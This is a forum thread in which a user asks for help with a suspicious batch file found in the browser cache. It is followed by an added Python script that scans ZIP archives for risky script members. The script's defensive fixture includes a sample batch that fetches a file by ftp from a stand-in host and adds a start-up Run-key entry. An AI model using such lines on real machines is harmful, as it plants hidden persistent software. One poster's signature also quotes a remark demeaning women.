
Thread: need help .BAT file extension

  1. #1
    Member
    Join Date
    Jul 2003
    Posts
    80

    need help .BAT file extension

    Hi,

    Lately when I've been on the internet an error message pops up saying that I have performed an illegal operation. When I click OK, my browser closes (IE ver.6). After a few messages I shut down my computer. The next day when I turned it on my desktop background was gone and there was a message in the background saying that my active desktop had been shut down. So I reactivated it by clicking on a help link. My mom ran a virus scan without me knowing and AVG Virus Scan found a .BAT extension file that was located in
    C:\WINDOWS\Temporary Internet Files\CONTENT.IE5\PZV5FHV4\FLASH1~1.ZIP:\FLASH-BR.BAT

    I read up a little on the BAT file extension and I learned that they represent a DOS batch file, a text file made up of a string of DOS commands that run in sequence when the batch file is executed. I'm not sure if this file has been opened but I think it might have done some damage to my PC.

    Any advice? Please respond.

    Thanks,
    BD]Hobbit
    You need people of intelligence on this sort of quest...

  2. #2
    Senior Member Zonewalker's Avatar
    Join Date
    Jul 2002
    Posts
    949
    If you use Notepad to open up the batch file (don't run the batch file, just open it - it won't do any damage unless you actually run the batch file) and C&P the contents here, then we might be able to tell you if it will damage your computer at all if it has been run.

    Z
    Quis Custodiet Ipsos Custodes

  3. #3
    Right turn Clyde Nokia's Avatar
    Join Date
    Aug 2003
    Location
    Button Moon
    Posts
    1,696
    Did your AV say it was a virus or just that it had found a .BAT file?

  4. #4
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    Right-click on the .bat file and select Edit. Select all, copy, and post it here. I'm sure we can tell you what you need to do to fix what it has changed.

    There is a vuln in IE whereby just viewing a web page your browser is forced to download a file without your knowledge; then that file can be run by using a double-slash in a codebase to bypass security and run the file in the 'My Computer' zone.

    Not only hackers use this but scum-ware distributors as well.
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  5. #5
    Member
    Join Date
    Jul 2003
    Posts
    80
    Yes, my AV did say that there was a virus infection detected and it contained a hidden BAT file extension. Unfortunately, I can't copy and paste it from Notepad because my mom emptied the temporary internet files and now I don't know how to get to the file because I can't find it. Is there anything else I can do?

    Thanks for your help so far,
    BD]Hobbit

  6. #6
    You may want to try to get that file back by undeleting it using this utility called R-Undelete - http://www.r-undelete.com/File_Undelete_Download.shtml

    Then post the text here as Tedob1 said and we'll all help you.

    My company had a BAT virus infection on one of its PCs and it was related to the Folding@Home web site - someone trojanized the install or the app.

  7. #7
    If it is a temporary internet file it couldn't hurt your PC to delete it, so I would just go ahead and delete it after you figure out if it is damaging. Also, I had a virus scanner called "PC Cillin" that quarantined literally thousands of critical .DLL files and .EXE files that were supposedly "infected", but I couldn't tell if they really were or not. They were all critical files so I had to restore them, virus or not. I had been receiving a Windows XP error telling me that system critical files had either been changed or removed, and even after restoring thousands of quarantined files I still ended up having to reinstall my operating system to stop the stupid error messages. The moral is, if it is in your quarantined files folder it is not always a virus, because a lot of the time the scanners are very sensitive and pick up a lot of legit files, so use good judgement with virus scanners.

  8. #8
    Member
    Join Date
    Jul 2003
    Posts
    80
    Well, since the file is deleted it shouldn't do any more damage, but my cousin who works at a computer repair shop offered to look at it and fix any damage.
    Problem solved.

    Thanks for the help
    BD]Hobbit

  9. #9
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    I really don't think a computer repair shop is a good solution. A batch file doesn't have to cause any damage to be dangerous. A bat file can be used to download and install ANYTHING without you knowing it, then add an entry to your registry to run it on start-up. I don't think an a++ by itself gives a technician the knowledge to even know what to look for. It may be nothing or you could be owned. If you're just going to take it to a repair shop you'd do better to have him reformat and reinstall everything.

  10. #10
    Junior Member
    Join Date
    Mar 2003
    Posts
    2
    Can you run an antivirus program that isn't dependent on the hard drive this occurred with? As an example, Symantec will run from the CD. Either that, or you may have another computer you can put the questionable drive into and run good antivirus software against it.

    My thoughts here are that a batch file could have done anything to your computer, but that doesn't mean that it did. If you can run a full file system scan, you can see if you have a problem or not.

    The reason to not just run your own antivirus client on the drive that may be infected is that some virii disable AV software, so you get a false negative.

    The reason to not just reformat and wipe is that putting in the text string (without quotes) "flash-br" calls up nothing in Google that is related to a virus, nor does entering this in at www.sarc.com. You may still decide to wipe the drive, but that may be akin to killing a fly with a thermonuclear device.
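
Added example, not part of any post in this thread: the replies above suggest reading the batch file without running it and note that such a file can fetch a program and register it to run at start-up. The Python sketch below lists the script members of a ZIP and flags those behaviours by reading the text only; the indicator patterns, `SAMPLE.BAT` and its contents are constructed for illustration.

```python
import io
import re
import zipfile

# Extensions Windows will run or interpret when the file is opened.
SCRIPT_EXTS = (".bat", ".cmd", ".com", ".exe", ".pif", ".scr", ".vbs", ".js")
MAX_BYTES = 1_000_000  # do not read oversized members into memory

# Heuristics for the behaviours named in the thread (download, start-up
# registry entry). Assumed patterns for illustration, not a signature set.
INDICATORS = {
    "run-key persistence": re.compile(r"\\CurrentVersion\\Run", re.I),
    "registry write": re.compile(r"^\s*@?reg(edit)?\b", re.I),
    "network fetch": re.compile(r"^\s*@?t?ftp\b", re.I),
}


def triage_zip(data: bytes):
    """Return (member, line_no, label, line) findings. Nothing is
    extracted to disk or executed; batch members are only read as text."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not name.lower().endswith(SCRIPT_EXTS):
                continue
            findings.append((name, 0, "executable member", ""))
            is_batch = name.lower().endswith((".bat", ".cmd"))
            if not is_batch or info.file_size > MAX_BYTES:
                continue
            text = zf.read(info).decode("cp437", errors="replace")
            for no, line in enumerate(text.splitlines(), 1):
                for label, rx in INDICATORS.items():
                    if rx.search(line):
                        findings.append((name, no, label, line.strip()))
    return findings


def build_sample() -> bytes:
    """Constructed archive; the batch contents are invented sample data."""
    bat = ("@echo off\r\n"
           "ftp -s:get.txt files.example.invalid\r\n"
           "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
           "/v upd /d C:\\WINDOWS\\upd.exe\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("SAMPLE.BAT", bat)
        zf.writestr("readme.txt", "plain text, ignored")
    return buf.getvalue()
```

A hit only says which lines deserve a human read; an empty result does not show the file is harmless.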
